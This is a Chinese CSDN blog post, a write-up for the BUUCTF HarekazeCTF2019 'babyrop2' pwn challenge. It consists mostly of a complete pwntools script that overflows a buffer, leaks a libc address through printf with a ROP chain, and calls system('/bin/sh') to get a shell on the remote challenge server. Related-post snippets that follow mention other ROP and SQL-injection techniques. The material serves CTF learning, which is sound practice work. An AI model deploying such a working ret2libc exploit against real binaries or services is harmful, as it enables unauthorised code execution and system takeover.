BUUCTF HarekazeCTF2019 babyrop2

最新推荐文章于 2024-05-05 22:46:05 发布
最新推荐文章于 2024-05-05 22:46:05 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: 题目 学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/102854742
版权

这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长)
exp:

#coding:utf-8
#name:doudou
from pwn import *
#p=process('./babyrop2')
p=remote('node3.buuoj.cn',28818)
elf=ELF('./babyrop2')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def debug():
	gdb.attach(p)
p.recvuntil('name? ')
pop_rdi=0x00400733
pop_rsi_r15=0x000400731
main_addr=0x400636
form_str=0x00400770
pd='a'*0x20+'aaaaaaaa'
#pd+=p64(pop_rdi)+p64(elf.got['printf'])+p64(elf.plt['printf'])+p64(0x0400636)
pd+=p64(pop_rdi)+p64(form_str)+p64(pop_rsi_r15)+p64(elf.got['read'])+p64(0)+p64(elf.plt['printf'])+p64(main_addr)
#gdb.attach(p,'b*0x04006CA')
p.sendline(pd)
read_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
#libc=LibcSearcher('read',read_addr)
libcbase=read_addr-libc.symbols['read']
system_addr=libcbase+libc.symbols['system']
bin_sh=libcbase+libc.search('/bin/sh').next()
p.recvuntil('name? ')
pd='a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)
p.sendline(pd)








p.interactive()
doudoudedi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2574
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 700
bjdctf_2020_babyrop
[HarekazeCTF2019]Easy Notes
shinygod的博客
02-23 529
[HarekazeCTF2019]Easy Notes
[HarekazeCTF2019]baby_rop[BUUCTF]
最新发布
moonlightsunshin的博客
05-05 300
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。
[BUU刷题记录]day01-起步
anwen12的博客
12-13 4624
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux
[HarekazeCTF2019]Easy Notes-代码审计
leekos的博客,分享web安全相关知识~
08-24 192
会被替换为空,所以最终文件名就符合session文件的格式了,session文件名可控。目录下面,所以我们可以尝试session伪造一下,伪造一个session文件。如果我们能够控制session文件,就可以拿到flag了。登录之后有几个功能点,可以添加节点,然后使用。我们发现想要拿到flag的条件时。这里可以看到,导出的文件也是写到。会生成16进制字符串,
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF】web之强网杯2019随便注
12-14
1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# 得到数据库 表:1’;show ...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
[HarekazeCTF2019]baby_rop2
m0sway的博客
04-07 1006
[HarekazeCTF2019]baby_rop2 WriteUp BUU_PWN
[HarekazeCTF2019]baby_rop1
m0_64195960的博客
06-30 642
前言:有两个新的知识点,一个是寻找函数地址,一个是当flag不在根目录下的解决办法开启了栈不可执行保护我们看到了system函数,我们通过shift+f12找一下字符串呜呜它给的实在太多了,有system函数,有/bin/sh,有栈溢出下面介绍两种找system函数地址的方式(因为博主之前只会做那种白给后门函数的题,或者gdb找)注意:我们在这里不是嗯翻,一个程序plt装载的位置大概在灰色部分后面一点(具体原因就不展开啦)我们可以通过调上方彩色的部分来定位这个有点烦,但还是讲讲这样就可以直接获得的,比较发现
babyrop2 疑惑及解决
m0_48127441的博客
04-07 157
简单的rop题 通过printf泄露libc地址 然后找到libc基址,从而找到one_gadget地址 实现获得shell 疑惑点是 泄露printf地址时,不输出 泄露read地址数据正常
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3657
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
BUUCTF - PWN】babyrop
古月浪子的博客
03-25 1743
checksec一下,可以栈溢出 IDA打开看看,读取随机数作为参数传入函数中 读取输入,进行字符串比较,不同则退出,相同则返回输入的第8个字节,可以通过输入 \0 绕过字符串比较 返回的字节作为read的长度,buf只有231字节,可以通过传入255来栈溢出,然后就是标准的ret2libc了 from pwn import * from LibcSearcher import * co...
buuctf babyrop
carol2358的博客
04-08 571
pwn菜鸡争取一天写一道吧,记录一下做题过程,方便复现 先checksec ida f5 大致的流程就是先生成一个随机数,然后将这个随机数放入buf,再把buf传到71F 在71F里,buf变成a1,把a1放入s,然后往71F的buf里输入数据,这一步要注意,我们要做的是通过传入数据,把v5覆盖掉,因为返回值是v5,而v5和buf的关系在stack里是这样的 所以我们传入7个以上的字节(...
bjdctf2020 babyrop
pondzhang的专栏
05-09 298
from pwn import * p = process('./bjdctf_2020_babyrop') libcelf = ELF('./libc-2.23.so') pop_rdi_ret = 0x0000000000400733 pop_rsi_r15_ret = 0x0000000000400731 pltputs = 0x00000000004004E0 main = 0x00000000004006AD gotputs = 0x0000000000601018 payload = 'a' *
PHP获取远程图片宽、高
李维山的博客
02-20 459
使用函数 getimagesize: <?php $remote_png_url = 'http://xxx.png'; $img_data = getimagesize($remote_png_url); print_r($img_data); 打印结果如下: Array ( [0] => 290 [1] => 69 [2] => 3 [3] => width="290" height="69" [b
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值